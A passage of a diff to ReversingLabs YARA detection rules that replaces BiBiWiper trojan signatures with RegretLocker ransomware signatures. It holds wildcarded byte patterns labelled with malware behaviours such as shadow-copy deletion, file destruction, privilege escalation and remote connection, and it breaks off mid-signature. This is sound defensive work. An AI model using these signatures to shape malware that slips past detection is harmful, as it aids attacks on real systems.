74 ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5A 59 5B + 8B E5 5D C2 } - $liblzf_decompression_1 = { - 83 EC ?? 8B 44 24 ?? 53 55 8D 2C 11 89 4C 24 ?? 8B 54 24 ?? 33 DB 03 C2 89 6C 24 ?? - 56 89 44 24 ?? 0F B6 41 ?? 8D 72 ?? 0F B6 11 C1 E2 ?? 0B D0 8D 45 ?? 89 44 24 ?? 57 - 8B F9 3B C8 0F 83 ?? ?? ?? ?? 0F B6 47 ?? C1 E2 ?? 0B D0 6B C2 ?? 8B CA C1 E9 ?? 33 - CA 89 54 24 ?? 8B 54 24 ?? C1 E9 ?? 2B C8 8B 44 24 ?? 81 E1 ?? ?? ?? ?? 8B 2C 88 8B - C7 2B 44 24 ?? 03 6C 24 ?? 89 04 8A 8B C7 8B 54 24 ?? 2B C5 48 89 44 24 ?? 3D ?? ?? - ?? ?? 0F 8D ?? ?? ?? ?? 3B EA 0F 86 ?? ?? ?? ?? 8A 45 ?? 3A 47 ?? 0F 85 ?? ?? ?? ?? - 0F B6 55 ?? 8D 4F ?? 0F B6 45 ?? 89 4C 24 ?? 0F B6 09 C1 E2 ?? 0B D0 C1 E1 ?? 0F B6 - 07 0B C8 3B D1 0F 85 ?? ?? ?? ?? 8B 44 24 ?? B9 ?? ?? ?? ?? 2B C7 3B C1 6A ?? 0F 47 - C1 89 44 24 ?? 8D 46 ?? 5A 3B 44 24 ?? 72 ?? 33 C9 8B C6 85 DB 0F 94 C1 2B C1 83 C0 - ?? 3B 44 24 ?? 0F 83 ?? ?? ?? ?? 8B C6 8D 4B ?? 2B C3 88 48 ?? 33 C0 85 DB 8B 5C 24 - ?? 0F 94 C0 2B F0 83 FB ?? 0F 86 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? - ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 - ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 + $enumerate_drives = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 8B D8 85 DB 74 ?? C1 EB ?? 8D B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8 + ?? 74 ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ?? 8D 76 ?? 4B 85 DB 75 ?? 5F 5E 5A 59 5B 8B + E5 5D C3 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? C7 + 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 + ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ?? 6A ?? 8D 85 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 40 ?? 50 FF 15 ?? ?? ?? + ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 + ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2 } - $liblzf_decompression_2 = { - 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A - 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 - ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 - ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? - 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8D 0C 3A 2B EF 42 41 3B D3 - 73 ?? 8A 04 29 3A 01 74 ?? 8B 5C 24 ?? 83 EA ?? 83 FA ?? 73 ?? 8B CB 8A C2 C1 F9 ?? - C0 E0 ?? 02 C8 88 0E 46 EB ?? 8B C3 C1 F8 ?? 2C ?? 88 06 8D 42 ?? 88 46 ?? 83 C6 ?? - 8B 7C 24 ?? 8B 44 24 ?? 47 88 1E 03 FA 33 DB 83 C6 ?? 3B F8 72 ?? 8B 6C 24 ?? 8D 46 - ?? 3B 44 24 ?? 76 ?? 33 C0 EB ?? 3B 74 24 ?? 73 ?? 8A 07 43 88 06 46 8B 44 24 ?? 47 - 83 FB ?? 75 ?? C6 46 ?? ?? 33 DB 46 3B F8 73 ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8A 07 43 - 88 06 46 47 83 FB ?? 75 ?? C6 46 ?? ?? 33 DB 46 3B FD 72 ?? 8B CE 8D 53 ?? 2B CB 88 - 51 ?? 33 C9 85 DB 0F 94 C1 2B F1 2B 74 24 ?? 8B C6 5F 5E 5D 5B 83 C4 ?? C3 + $escalate_privileges = { + 55 8B EC 83 C4 ?? 53 51 52 56 57 8D 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F + 85 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 + ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50 + FF 75 ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? AD 8B F8 83 + 7E ?? ?? 74 ?? C7 46 ?? ?? ?? ?? ?? 83 C6 ?? 4F 85 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 75 + ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C3 } - $decrypt_resource_snippet_v7 = { - C1 EE ?? 3B F9 0F 47 F0 85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 0F B6 C1 66 89 - 02 8B C1 C1 E8 ?? 8D 52 ?? 0F B6 C0 66 89 42 ?? C1 E9 ?? 0F B6 C1 C1 E9 ?? 45 66 89 - 42 ?? 0F B6 C1 66 89 42 ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 33 C9 5D 66 89 0C 43 - 5F 5E 8B C3 5B 83 C4 ?? C3 + $enumerate_netshare = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 6A ?? + 8D 45 ?? 50 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 83 7E ?? ?? 75 ?? 68 ?? + ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 C7 03 ?? ?? ?? ?? C7 43 ?? + ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 8D 47 ?? 50 53 FF 15 ?? ?? ?? + ?? 83 C4 ?? 53 FF 15 ?? ?? ?? ?? FF 36 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? + ?? 53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 83 7D ?? ?? 75 ?? + FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2 } - $state_machine_snippet_v7 = { - 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B - 94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B 54 24 ?? - 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 94 - 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 74 24 - ?? 8B F0 FF B4 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? F7 DE 8B 94 24 ?? ?? ?? ?? 1B F6 - 81 E6 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? - ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 + $find_files_v2 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D BD + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? + 83 C4 ?? 66 83 7C 47 ?? ?? 74 ?? 66 C7 04 47 ?? ?? 83 C7 ?? C7 04 47 ?? ?? ?? ?? C7 + 44 47 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ?? + 8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 C4 + ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 53 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2 } condition: - uint16(0)==0x5A4D and ($decrypt_resource_v1 and $generate_filename_v1) or ($decrypt_resource_v2 and $generate_filename_v2) or ($decrypt_resource_v3 and $generate_filename_v3) or ($decrypt_resource_v4 and $generate_filename_snippet_v4) or ($decrypt_resource_snippet_v5 and all of ($liblzf_decompression_*)) or ($decrypt_resource_snippet_v6 and all of ($liblzf_decompression_*)) or ($decrypt_resource_snippet_v7 and $state_machine_snippet_v7) + uint16(0)==0x5A4D and (($find_files_v1 and $enumerate_drives and $escalate_privileges) or ($find_files_v2 and $enumerate_netshare)) } -rule REVERSINGLABS_Win32_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Ransomware_Regretlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects BiBiWiper trojan." + description = "Yara rule that detects RegretLocker ransomware." author = "ReversingLabs" - id = "8462ceb8-ec54-5f92-a3e7-c96e52647ca7" - date = "2023-11-28" - modified = "2023-11-28" + id = "c4e515cc-b0c2-57b2-a230-619ec01ac8d4" + date = "2021-04-02" + modified = "2021-04-02" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Win32.Trojan.BiBiWiper.yara#L1-L102" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d75954c05a8f82ad90a4adf6a2a3748928488ddebe40d8f8a790bfcde0b02a11" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.RegretLocker.yara#L1-L206" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3927dfecacd74f60a169f82b68df5747daa90eaba77f24c5e730ce4c48d426a3" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "BiBiWiper" + tc_detection_type = "Ransomware" + tc_detection_name = "RegretLocker" tc_detection_factor = 5 importance = 25 strings: - $delete_shadow_copies_p1 = { - 48 89 5C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 - 48 89 45 ?? 33 DB 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 - 8D 4C 24 ?? 48 89 5C 24 ?? 44 8D 43 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 - ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F - 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C - 24 ?? 48 2B D1 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? - ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 - 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 - 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? - FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8B 4C 24 ?? 48 FF C2 48 8B C1 - 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? 48 83 C2 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? - 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? - ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 7C - 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 - 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 - 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 - C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 - 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 - 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F 11 45 ?? 0F 11 45 ?? 0F + $remote_connection_p1 = { + 55 8B EC 8B 41 ?? 8B 55 ?? 3B C2 72 ?? 2B C2 56 8B 75 ?? 3B C6 0F 42 F0 83 79 ?? ?? + 72 ?? 8B 09 56 03 CA 51 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 5E 5D C2 ?? ?? E8 ?? + ?? ?? ?? CC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 53 + 56 57 50 E8 ?? ?? ?? ?? 83 65 ?? ?? 50 E8 ?? ?? ?? ?? 83 4D ?? ?? 8A D8 59 59 8D 4D + ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? + C7 45 ?? ?? ?? ?? ?? 8B CC 6A ?? 83 61 ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 + 19 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8B 8D ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 6A ?? 5B 3B CB C6 45 ?? ?? 0F 43 C2 80 78 ?? + ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? + 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB + 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 84 } - $delete_shadow_copies_p2 = { - 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8B 4C 24 - ?? 48 FF C2 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? 48 83 C2 ?? 48 2B C1 48 - 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 5C 24 - ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 - D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? - ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 90 0F B6 01 88 04 0A 48 8D - 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 - ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C - 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F - 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 - FA ?? 72 ?? 48 8B 4C 24 ?? 48 FF C2 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? - 48 83 C2 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 - ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 - 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? - 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? - ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 90 - 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 - ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 - 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 + $remote_connection_p2 = { + 8D 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 84 C0 75 ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 3B FB 8D B5 ?? ?? ?? ?? 8B 9D + ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F 43 C3 83 FF ?? 0F 43 F3 0F 43 D3 33 C9 8A 40 ?? 3A + 46 ?? 0F BE 42 ?? 0F 94 C1 3B C8 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ?? + ?? 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ?? ?? 74 ?? 32 DB EB ?? B3 ?? F6 + 45 ?? ?? 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5F 6A ?? 33 DB 89 BD + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ?? ?? ?? + 88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B B5 ?? ?? ?? ?? C6 45 ?? ?? 83 FE ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 84 C0 74 ?? 6A ?? 5E 83 EC ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ?? + ?? ?? 88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? + 89 59 ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 } - $destroy_files_p1 = { - 48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 - 33 C4 48 89 44 24 ?? 4D 8B E9 4D 8B E0 4C 8B F9 48 63 BC 24 ?? ?? ?? ?? 33 F6 89 74 - 24 ?? 48 8B 05 ?? ?? ?? ?? 48 FF C0 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 B8 - ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48 C1 FA ?? 48 8B C2 48 C1 E8 ?? 48 03 D0 48 69 C2 - ?? ?? ?? ?? 48 3B C8 75 ?? 4C 8B 05 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8D 0D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 C1 E3 ?? 33 D2 49 8B C4 49 F7 F5 48 - 8B E8 48 2B EB 83 FF ?? 7E ?? 48 8D 47 ?? 48 0F AF C3 33 D2 49 F7 F4 EB ?? 48 8B D6 - 45 33 C0 49 8B CF E8 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? 48 63 C8 49 3B CC 0F 87 ?? - ?? ?? ?? 49 8B C4 48 2B C1 49 8B FC 48 2B F9 48 3B D8 48 0F 42 FB 48 8B CF E8 ?? ?? - ?? ?? 48 89 44 24 ?? 0F 57 C0 4C 63 F7 F3 0F 7F 44 24 ?? 48 89 74 24 ?? 85 FF 74 ?? - 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 4C 3B F0 0F 87 ?? ?? ?? ?? 49 81 FE ?? ?? ?? ?? 72 + $remote_connection_p3 = { + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 83 EE ?? 75 ?? 8B B5 ?? ?? ?? ?? 8D 46 ?? 83 F8 ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 59 59 89 5D ?? 89 7D ?? 88 9D ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 + 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 8B + F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ?? + ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ?? + E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 } - $destroy_files_p2 = { - 49 8D 4E ?? 49 3B CE 0F 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ?? - ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 49 8B CE E8 ?? ?? ?? ?? 48 89 44 24 - ?? 4A 8D 1C 30 48 89 5C 24 ?? 4D 8B C6 33 D2 48 8B C8 E8 ?? ?? ?? ?? 48 89 5C 24 ?? - C7 44 24 ?? ?? ?? ?? ?? 85 FF 7E ?? 48 8B DE 44 8B F7 66 0F 1F 44 00 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 88 04 0B 48 8D 5B ?? 49 83 EE ?? 75 ?? 4D 85 ED 7E - ?? 4D 8B CF 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 49 8B CF E8 ?? - ?? ?? ?? 48 63 C8 48 8D 04 29 48 03 C7 49 3B C4 76 ?? 49 8B FC 48 2B F9 48 2B FD 48 - 85 FF 7E ?? 41 B8 ?? ?? ?? ?? 48 8B D5 49 8B CF E8 ?? ?? ?? ?? FF C6 48 63 C6 49 3B - C5 7C ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24 - ?? 48 2B D1 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 - 83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 - 8B 9C 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3 + $remote_connection_p4 = { + 89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D + ?? E8 ?? ?? ?? ?? 8B 4D ?? 